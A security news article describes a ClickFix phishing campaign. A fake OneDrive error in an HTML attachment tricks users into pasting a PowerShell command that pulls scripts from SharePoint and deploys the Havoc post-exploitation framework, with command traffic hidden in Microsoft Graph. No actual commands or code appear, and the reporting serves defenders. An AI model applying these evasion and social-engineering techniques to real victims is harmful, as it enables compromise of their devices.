New ClickFix attack deploys Havoc C2 via Microsoft Sharepoint – BleepingComputer
Broadcom fixes three VMware zero-days exploited in attacksGoogle fixes Android zero-day exploited by Serbian authorities Microsoft Teams tactics, malware connect Black Basta, Cactus ransomwareGoogle expands Android AI scam detection to more Pixel devicesYouTube warns of AI-generated video of its CEO used in phishing attacksLook up: The new frontier of cyberthreats is in the skyToronto Zoo shares update on last year’s ransomware attackPrepare for Microsoft tech certifications with this low-cost course dealHow to access the Dark Web using the Tor BrowserHow to enable Kernel-mode Hardware-enforced Stack Protection in Windows 11How to use the Windows Registry EditorHow to backup and restore the Windows RegistryHow to start Windows in Safe ModeHow to remove a Trojan, Virus, Worm, or other MalwareHow to show hidden files in Windows 7How to see hidden files in WindowsRemove the Theonlinesearch.com Search RedirectRemove the Smartwebfinder.com Search RedirectHow to remove the PBlock+ adware browser extensionRemove the Toksearches.xyz Search RedirectRemove Security Tool and SecurityTool (Uninstall Guide)How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundoHow to remove Antivirus 2009 (Uninstall Instructions)How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKillerLocky Ransomware Information, Help Guide, and FAQCryptoLocker Ransomware Information Guide and FAQCryptorBit and HowDecrypt Information Guide and FAQCryptoDefense and How_Decrypt Ransomware Information Guide and FAQQualys BrowserCheckSTOPDecrypterAuroraDecrypterFilesLockerDecrypterAdwCleanerComboFixRKillJunkware Removal TooleLearningIT Certification CoursesGear + GadgetsSecurityBest VPNsHow to change IP addressAccess the dark web safelyBest VPN for YouTubeA newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that deploy the Havok post-exploitation framework for remote access to compromised devices.ClickFix is a social-engineering tactic that emerged last year, where threat actors create websites or phishing attachments that display fake errors and then prompt the user to click a button to fix them.Clicking the button will copy a malicious PowerShell command into the Windows clipboard, which users are then prompted to paste into a command prompt to “fix” the error. However, as expected, the malicious PowerShell command will instead execute a script hosted on a remote site that downloads and installs malware on the devices.In a new ClickFix campaign discovered by Fortinet’s Fortiguard Labs, threat actors are sending phishing emails stating that a “restricted notice” is available to review and that recipients should open the attached HTML document (‘Documents.html’) to view it.When opened, the HTML displays a fake 0x8004de86 error, stating that it “Failed to connect to the “One Drive” cloud service” and that users must fix the error by updating the DNS cache manually. Clicking the “How to fix” button will automatically copy a PowerShell command to the Windows clipboard and then display instructions on how to execute it.This PowerShell command will attempt to launch another PowerShell script hosted on the threat actor’s SharePoint server.Fortiguard says that the script checks whether the device is in a sandbox environment by querying the number of devices in the Windows domain. If it determines it’s in a sandbox, the script will terminate.Otherwise, the script will modify the Windows Registry to add a value indicating that the script was run on the device. It will then proceed to check if Python is installed on the device and, if not, install the interpreter.Finally, a Python script is downloaded from the same SharePoint site and executed to deploy the Havok post-exploitation command and control framework as an injected DLL.Havoc is an open-source post-exploitation framework similar to Cobalt Strike, allowing attackers to remotely control compromised devices. Threat actors commonly use post-exploitation frameworks like Havoc to breach corporate networks and then spread laterally to other devices on the network.In this campaign, Havok is configured to communicate back to the threat actor’s services through Microsoft’s Graph API, embedding malicious traffic within legitimate cloud services. By doing so, the attackers blend in with regular network communications to evade detection.The malware uses SharePoint APIs on Microsoft Graph to send and receive commands, effectively transforming the attacker’s SharePoint account into a data exchange system.ClickFix attacks have become increasingly popular among cybercriminals, who use them to deploy a wide variety of malware, including infostealers, DarkGate, and remote access trojans.Threat actors have also begun to evolve the technique to use them on social media platforms like Telegram, where a fake identity verification service named ‘Safeguard’ was used to trick users into running PowerShell commands that install a Cobalt Strike beacon.Telegram captcha tricks you into running malicious PowerShell scriptsLearn Windows PowerShell and automation scripting with this $20 bundleEncryptHub breaches 618 orgs to deploy infostealers, ransomwareRussian phishing campaigns exploit Signal’s device-linking featureDarcula PhaaS can now auto-generate phishing kits for any brandNot a member yet? Register NowMicrosoft links recent Microsoft 365 outage to buggy updateNew Microsoft 365 outage impacts Teams, causes call failuresNearly 12,000 API keys and passwords found in AI training datasetDiscover full attack chains and identify their root cause. Learn more about Automated Security Validation.Integrating LLMs into security operations using Wazuh. Learn how to get started.Overdue a password health-check? Audit your Active Directory for freeSharpRhino resurfaces: How this malware evades detection. See how it works.5 Browser Security Threats Overlooked by Security Tools. Get the Free ReportTerms of Use – Privacy Policy – Ethics Statement – Affiliate DisclosureCopyright @ 2003 – 2025 Bleeping Computer® LLC – All Rights ReservedNot a member yet? Register NowRead our posting guidelinese to learn what content is prohibited.
